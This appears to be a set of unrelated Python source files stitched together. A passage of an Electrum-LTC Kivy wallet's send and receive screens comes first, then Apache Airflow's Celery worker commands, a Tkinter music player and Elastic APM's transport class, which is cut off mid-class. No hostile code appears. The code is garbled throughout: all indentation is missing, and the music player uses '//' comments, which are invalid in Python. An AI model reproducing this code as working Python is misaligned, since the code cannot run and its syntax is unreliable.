if not self.app.wallet:
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_invoice_status(invoice)
status_str = invoice.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice):
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
if is_lightning:
assert isinstance(item, LNInvoice)
key = item.rhash
address = key
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
key = item.id
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
self.app.protected(_('Pay lightning invoice?'), self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
self.app.wallet.lnworker.pay(invoice.invoice, attempts=10)
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
d = ConfirmTxDialog(self.app, invoice)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum_ltc.util import create_bip21_uri
amount = self.amount
if amount:
a, u = self.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
key = address
else:
assert isinstance(req, LNInvoice)
key = req.rhash
address = req.invoice
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
celery_command.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Celery command"""
from multiprocessing import Process
from typing import Optional
import daemon
import psutil
import sqlalchemy.exc
from celery import maybe_patch_concurrency # type: ignore[attr-defined]
from daemon.pidfile import TimeoutPIDLockFile
from lockfile.pidlockfile import read_pid_from_pidfile, remove_existing_pidfile
from airflow import settings
from airflow.configuration import conf
from airflow.executors.celery_executor import app as celery_app
from airflow.utils import cli as cli_utils
from airflow.utils.cli import setup_locations, setup_logging
from airflow.utils.serve_logs import serve_logs
WORKER_PROCESS_NAME = "worker"
@cli_utils.action_cli
def flower(args):
"""Starts Flower, Celery monitoring tool"""
options = [
"flower",
conf.get('celery', 'BROKER_URL'),
f"--address={args.hostname}",
f"--port={args.port}",
]
if args.broker_api:
options.append(f"--broker-api={args.broker_api}")
if args.url_prefix:
options.append(f"--url-prefix={args.url_prefix}")
if args.basic_auth:
options.append(f"--basic-auth={args.basic_auth}")
if args.flower_conf:
options.append(f"--conf={args.flower_conf}")
if args.daemon:
pidfile, stdout, stderr, _ = setup_locations(
process="flower",
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
with open(stdout, "w+") as stdout, open(stderr, "w+") as stderr:
ctx = daemon.DaemonContext(
pidfile=TimeoutPIDLockFile(pidfile, -1),
stdout=stdout,
stderr=stderr,
)
with ctx:
celery_app.start(options)
else:
celery_app.start(options)
def _serve_logs(skip_serve_logs: bool = False) -> Optional[Process]:
"""Starts serve_logs sub-process"""
if skip_serve_logs is False:
sub_proc = Process(target=serve_logs)
sub_proc.start()
return sub_proc
return None
def _run_worker(options, skip_serve_logs):
sub_proc = _serve_logs(skip_serve_logs)
try:
celery_app.worker_main(options)
finally:
if sub_proc:
sub_proc.terminate()
@cli_utils.action_cli
def worker(args):
"""Starts Airflow Celery worker"""
# Disable connection pool so that celery worker does not hold an unnecessary db connection
settings.reconfigure_orm(disable_connection_pool=True)
if not settings.validate_session():
raise SystemExit("Worker exiting, database connection precheck failed.")
autoscale = args.autoscale
skip_serve_logs = args.skip_serve_logs
if autoscale is None and conf.has_option("celery", "worker_autoscale"):
autoscale = conf.get("celery", "worker_autoscale")
# Setup locations
pid_file_path, stdout, stderr, log_file = setup_locations(
process=WORKER_PROCESS_NAME,
pid=args.pid,
stdout=args.stdout,
stderr=args.stderr,
log=args.log_file,
)
if hasattr(celery_app.backend, 'ResultSession'):
# Pre-create the database tables now, otherwise SQLA via Celery has a
# race condition where one of the subprocesses can die with "Table
# already exists" error, because SQLA checks for which tables exist,
# then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
# EXISTS
try:
session = celery_app.backend.ResultSession()
session.close()
except sqlalchemy.exc.IntegrityError:
# At least on postgres, trying to create a table that already exist
# gives a unique constraint violation or the
# "pg_type_typname_nsp_index" table. If this happens we can ignore
# it, we raced to create the tables and lost.
pass
# backwards-compatible: https://github.com/apache/airflow/pull/21506#pullrequestreview-879893763
celery_log_level = conf.get('logging', 'CELERY_LOGGING_LEVEL')
if not celery_log_level:
celery_log_level = conf.get('logging', 'LOGGING_LEVEL')
# Setup Celery worker
options = [
'worker',
'-O',
'fair',
'--queues',
args.queues,
'--concurrency',
args.concurrency,
'--hostname',
args.celery_hostname,
'--loglevel',
celery_log_level,
'--pidfile',
pid_file_path,
]
if autoscale:
options.extend(['--autoscale', autoscale])
if args.without_mingle:
options.append('--without-mingle')
if args.without_gossip:
options.append('--without-gossip')
if conf.has_option("celery", "pool"):
pool = conf.get("celery", "pool")
options.extend(["--pool", pool])
# Celery pools of type eventlet and gevent use greenlets, which
# requires monkey patching the app:
# https://eventlet.net/doc/patching.html#monkey-patch
# Otherwise task instances hang on the workers and are never
# executed.
maybe_patch_concurrency(['-P', pool])
if args.daemon:
# Run Celery worker as daemon
handle = setup_logging(log_file)
with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
if args.umask:
umask = args.umask
ctx = daemon.DaemonContext(
files_preserve=[handle],
umask=int(umask, 8),
stdout=stdout_handle,
stderr=stderr_handle,
)
with ctx:
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
else:
# Run Celery worker in the same process
_run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
"""Sends SIGTERM to Celery worker"""
# Read PID from file
if args.pid:
pid_file_path = args.pid
else:
pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
pid = read_pid_from_pidfile(pid_file_path)
# Send SIGTERM
if pid:
worker_process = psutil.Process(pid)
worker_process.terminate()
# Remove pid file
remove_existing_pidfile(pid_file_path)
|
musicPlayer.py | import os
import threading
import time
import tkinter.messagebox
from tkinter import *
from tkinter import filedialog
from tkinter import ttk
from ttkthemes import themed_tk as tk
from mutagen.mp3 import MP3
from pygame import mixer
root = tk.ThemedTk()
root.get_themes() // Returns a list of all themes that can be set
root.set_theme("radiance") // Sets an available theme
// Fonts - Arial (corresponds to Helvetica), Courier New (Courier), Comic Sans MS, Fixedsys,
// MS Sans Serif, MS Serif, Symbol, System, Times New Roman (Times), and Verdana
//
// Styles - normal, bold, roman, italic, underline, and overstrike.
statusbar = ttk.Label(root, text="Welcome to Melody", relief=SUNKEN, anchor=W, font='Times 10 italic')
statusbar.pack(side=BOTTOM, fill=X)
// Create the menubar
menubar = Menu(root)
root.config(menu=menubar)
// Create the submenu
subMenu = Menu(menubar, tearoff=0)
playlist = []
// playlist - contains the full path + filename
// playlistbox - contains just the filename
// Fullpath + filename is required to play the music inside play_music load function
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
mixer.music.queue(filename_path)
def add_to_playlist(filename):
filename = os.path.basename(filename)
index = 0
playlistbox.insert(index, filename)
playlist.insert(index, filename_path)
index += 1
menubar.add_cascade(label="File", menu=subMenu)
subMenu.add_command(label="Open", command=browse_file)
subMenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Melody', 'This is a music player build using Python Tkinter by @attreyabhatt')
subMenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=subMenu)
subMenu.add_command(label="About Us", command=about_us)
mixer.init() // initializing the mixer
root.title("Melody")
root.iconbitmap(r'images/melody.ico')
// Root Window - StatusBar, LeftFrame, RightFrame
// LeftFrame - The listbox (playlist)
// RightFrame - TopFrame,MiddleFrame and the BottomFrame
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=30, pady=30)
playlistbox = Listbox(leftframe)
playlistbox.pack()
addBtn = ttk.Button(leftframe, text="+ Add", command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
playlistbox.delete(selected_song)
playlist.pop(selected_song)
delBtn = ttk.Button(leftframe, text="- Del", command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack(pady=30)
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text='Total Length : --:--')
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text='Current Time : --:--', relief=GROOVE)
currenttimelabel.pack()
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
// div - total_length/60, mod - total_length % 60
mins, secs = divmod(total_length, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
lengthlabel['text'] = "Total Length" + ' - ' + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
def start_count(t):
global paused
// mixer.music.get_busy(): - Returns FALSE when we press the stop button (music stop playing)
// Continue - Ignores all of the statements below it. We check if music is paused or not.
current_time = 0
while current_time <= t and mixer.music.get_busy():
if paused:
continue
else:
mins, secs = divmod(current_time, 60)
mins = round(mins)
secs = round(secs)
timeformat = '{:02d}:{:02d}'.format(mins, secs)
currenttimelabel['text'] = "Current Time" + ' - ' + timeformat
time.sleep(1)
current_time += 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0])
play_it = playlist[selected_song]
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing music" + ' - ' + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('File not found', 'Melody could not find the file. Please check again.')
def stop_music():
mixer.music.stop()
statusbar['text'] = "Music Stopped"
paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
// set_volume of mixer takes value only from 0 to 1. Example - 0, 0.1,0.55,0.54.0.99,1
muted = FALSE
def mute_music():
global muted
if muted: // Unmute the music
mixer.music.set_volume(0.7)
volumeBtn.configure(image=volumePhoto)
scale.set(70)
muted = FALSE
else: // mute the music
mixer.music.set_volume(0)
volumeBtn.configure(image=mutePhoto)
scale.set(0)
muted = TRUE
middleframe = Frame(rightframe)
middleframe.pack(pady=30, padx=30)
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music)
playBtn.grid(row=0, column=0, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music)
stopBtn.grid(row=0, column=1, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music)
pauseBtn.grid(row=0, column=2, padx=10)
// Bottom Frame for volume, rewind, mute etc.
bottomframe = Frame(rightframe)
bottomframe.pack()
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music)
rewindBtn.grid(row=0, column=0)
mutePhoto = PhotoImage(file='images/mute.png')
volumePhoto = PhotoImage(file='images/volume.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)
volumeBtn.grid(row=0, column=1)
scale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)
scale.set(70) # implement the default value of scale when music player starts
mixer.music.set_volume(0.7)
scale.grid(row=0, column=2, pady=15, padx=30)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing)
root.mainloop()
|
base.py | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import gzip
import io
import os
import queue as _queue
import random
import sys
import threading
import time
import timeit
from collections import defaultdict
from elasticapm.utils import json_encoder
from elasticapm.utils.logging import get_logger
from elasticapm.utils.threading import ThreadManager
logger = get_logger("elasticapm.transport")
class Transport(ThreadManager):
"""
All transport implementations need to subclass this class
You must implement a send method..
"""
async_mode = False
def __init__(
self,
client,
compress_level=5,
json_serializer=json_encoder.dumps,
queue_chill_count=500,
queue_chill_time=1.0,
processors=None,
**kwargs
):
"""
Create a new Transport instance
:param compress_level: GZip compress level. If zero, no GZip compression will be used
:param json_serializer: serializer to use for JSON encoding
:param kwargs:
"""
self.client = client
self.state = TransportState()
self._metadata = None
self._compress_level = min(9, max(0, compress_level if compress_level is not None else 0))
self._json_serializer = json_serializer
self._queued_data = None
self._event_queue = self._init_event_queue(chill_until=queue_chill_count, max_chill_time=queue_chill_time)
self._is_chilled_queue = isinstance(self._event_queue, ChilledQueue)
self._thread = None
self._last_flush = timeit.default_timer()
self._counts = defaultdict(int)
self._flushed = threading.Event()
self._closed = False
self._processors = processors if processors is not None else []
super(Transport, self).__init__()
self.start_stop_order = sys.maxsize # ensure that the transport thread is always started/stopped last
@property
def _max_flush_time(self):
return self.client.config.api_request_time / 1000.0 if self.client else None
@property
def _max_buffer_size(self):
return self.client.config.api_request_size if self.client else None
def queue(self, event_type, data, flush=False):
try:
self._flushed.clear()
kwargs = {"chill": not (event_type == "close" or flush)} if self._is_chilled_queue else {}
self._event_queue.put((event_type, data, flush), block=False, **kwargs)
except _queue.Full:
logger.debug("Event of type %s dropped due to full event queue", event_type)
def _process_queue(self):
# Rebuild the metadata to capture new process information
if self.client:
self._metadata = self.client.build_metadata()
buffer = self._init_buffer()
buffer_written = False
# add some randomness to timeout to avoid stampedes of several workers that are booted at the same time
max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
while True:
since_last_flush = timeit.default_timer() - self._last_flush
# take max flush time into account to calculate timeout
timeout = max(0, max_flush_time - since_last_flush) if max_flush_time else None
timed_out = False
try:
event_type, data, flush = self._event_queue.get(block=True, timeout=timeout)
except _queue.Empty:
event_type, data, flush = None, None, None
timed_out = True
if event_type == "close":
if buffer_written:
try:
self._flush(buffer)
except Exception as exc:
logger.error(
"Exception occurred while flushing the buffer "
"before closing the transport connection: {0}".format(exc)
)
self._flushed.set()
return # time to go home!
if data is not None:
data = self._process_event(event_type, data)
if data is not None:
if not buffer_written:
# Write metadata just in time to allow for late metadata changes (such as in lambda)
self._write_metadata(buffer)
buffer.write((self._json_serializer({event_type: data}) + "\n").encode("utf-8"))
buffer_written = True
self._counts[event_type] += 1
queue_size = 0 if buffer.fileobj is None else buffer.fileobj.tell()
forced_flush = flush
if forced_flush:
logger.debug("forced flush")
elif timed_out or timeout == 0:
# update last flush time, as we might have waited for a non trivial amount of time in
# _event_queue.get()
since_last_flush = timeit.default_timer() - self._last_flush
logger.debug(
"flushing due to time since last flush %.3fs > max_flush_time %.3fs",
since_last_flush,
max_flush_time,
)
flush = True
elif self._max_buffer_size and queue_size > self._max_buffer_size:
logger.debug(
"flushing since queue size %d bytes > max_queue_size %d bytes", queue_size, self._max_buffer_size
)
flush = True
if flush:
if buffer_written:
self._flush(buffer, forced_flush=forced_flush)
elif forced_flush and "/localhost:" in self.client.config.server_url:
# No data on buffer, but due to manual flush we should send
# an empty payload with flushed=true query param, but only
# to a local APM server (or lambda extension)
self.send(None, flushed=True)
self._last_flush = timeit.default_timer()
buffer = self._init_buffer()
buffer_written = False
max_flush_time = self._max_flush_time * random.uniform(0.9, 1.1) if self._max_flush_time else None
self._flushed.set()
def _process_event(self, event_type, data):
# Run the data through processors
for processor in self._processors:
if not hasattr(processor, "event_types") or event_type in processor.event_types:
try:
data = processor(self.client, data)
if not data:
logger.debug(
"Dropped event of type %s due to processor %s.%s",
event_type,
processor.__module__,
processor.__name__,
)
return None
except Exception:
logger.warning(
"Dropped event of type %s due to exception in processor %s.%s",
event_type,
processor.__module__,
processor.__name__,
exc_info=True,
)
return None
return data
def _init_buffer(self):
buffer = gzip.GzipFile(fileobj=io.BytesIO(), mode="w", compresslevel=self._compress_level)
return buffer
def _write_metadata(self, buffer):
data = (self._json_serializer({"metadata": self._metadata}) + "\n").encode("utf-8")
buffer.write(data)
def add_metadata(self, data):
"""
Add additional metadata do the dictionary
Only used in specific instances where metadata relies on data we only
have at request time, such as for lambda metadata
Metadata is only merged one key deep.
"""
if self._metadata is not None:
# Merge one key deep
for key, val in data.items():
if isinstance(val, dict) and key in self._metadata and isinstance(self._metadata[key], dict):
self._metadata[key].update(val)
else:
self._metadata[key] = val
else:
self._metadata = data
def _init_event_queue(self, chill_until, max_chill_time):
# some libraries like eventlet monkeypatch queue.Queue and switch out the implementation.
# In those cases we can't rely on internals of queue.Queue to be there, so we simply use
# their queue and forgo the optimizations of ChilledQueue. In the case of eventlet, this
# isn't really a loss, because the main reason for ChilledQueue (avoiding context switches
# due to the event processor thread being woken up all the time) is not an issue.
if all(
(
hasattr(_queue.Queue, "not_full"),
hasattr(_queue.Queue, "not_empty"),
hasattr(_queue.Queue, "unfinished_tasks"),
)
):
return ChilledQueue(maxsize=10000, chill_until=chill_until, max_chill_time=max_chill_time)
else:
return _queue.Queue(maxsize=10000)
def _flush(self, buffer, forced_flush=False):
"""
Flush the queue. This method should only be called from the event processing queue
:return: None
"""
if not self.state.should_try():
logger.error("dropping flushed data due to transport failure back-off")
else:
fileobj = buffer.fileobj # get a reference to the fileobj before closing the gzip file
buffer.close()
# StringIO on Python 2 does not have getbuffer, so we need to fall back to getvalue
data = fileobj.getbuffer() if hasattr(fileobj, "getbuffer") else fileobj.getvalue()
try:
self.send(data, forced_flush=forced_flush)
self.handle_transport_success()
except Exception as e:
self.handle_transport_fail(e)
def start_thread(self, pid=None):
super(Transport, self).start_thread(pid=pid)
if (not self._thread or self.pid != self._thread.pid) and not self._closed:
self.handle_fork()
try:
self._thread = threading.Thread(target=self._process_queue, name="eapm event processor thread")
self._thread.daemon = True
self._thread.pid = self.pid
self._thread.start()
except RuntimeError:
pass
def send(self, data, forced_flush=False):
"""
You need to override this to do something with the actual
data. Usually - this is sending to a server
"""
raise NotImplementedError
def close(self):
"""
Cleans up resources and closes connection
:return:
"""
if self._closed or (not self._thread or self._thread.pid != os.getpid()):
return
self._closed = True
self.queue("close", None)
if not self._flushed.wait(timeout=self._max_flush_time):
logger.error("Closing the transport connection timed out.")
stop_thread = close
def flush(self):
"""
Trigger a flush of the queue.
Note: this method will only return once the queue is empty. This means it can block indefinitely if more events
are produced in other threads than can be consumed.
"""
self.queue(None, None, flush=True)
if not self._flushed.wait(timeout=self._max_flush_time):
raise ValueError("flush timed out")
def handle_transport_success(self, **kwargs):
"""
Success handler called by the transport on successful send
"""
self.state.set_success()
def handle_transport_fail(self, exception=None, **kwargs):
"""
Failure handler called by the transport on send failure
"""
message = str(exception)
logger.error("Failed to submit message: %r", message, exc_info=getattr(exception, "print_trace", True))
self.state.set_fail()
def handle_fork(self) -> None:
"""Helper method to run code after a fork has been detected"""
pass
# left for backwards compatibility
AsyncTransport = Transport
class TransportState(object):
ONLINE = 1
ERROR = 0
def __init__(self):
self.status = self.ONLINE
self.last_check = None
self.retry_number = -1
def should_try(self):
if self.status == self.ONLINE:
return True
interval = min(self.retry_number, 6) ** 2
return timeit.default_timer() - self.last_check > interval
def set_fail(self):
self.status = self.ERROR
self.retry_number += 1
self.last_check = timeit.default_timer()
def set_success(self):
self.status = self.ONLINE
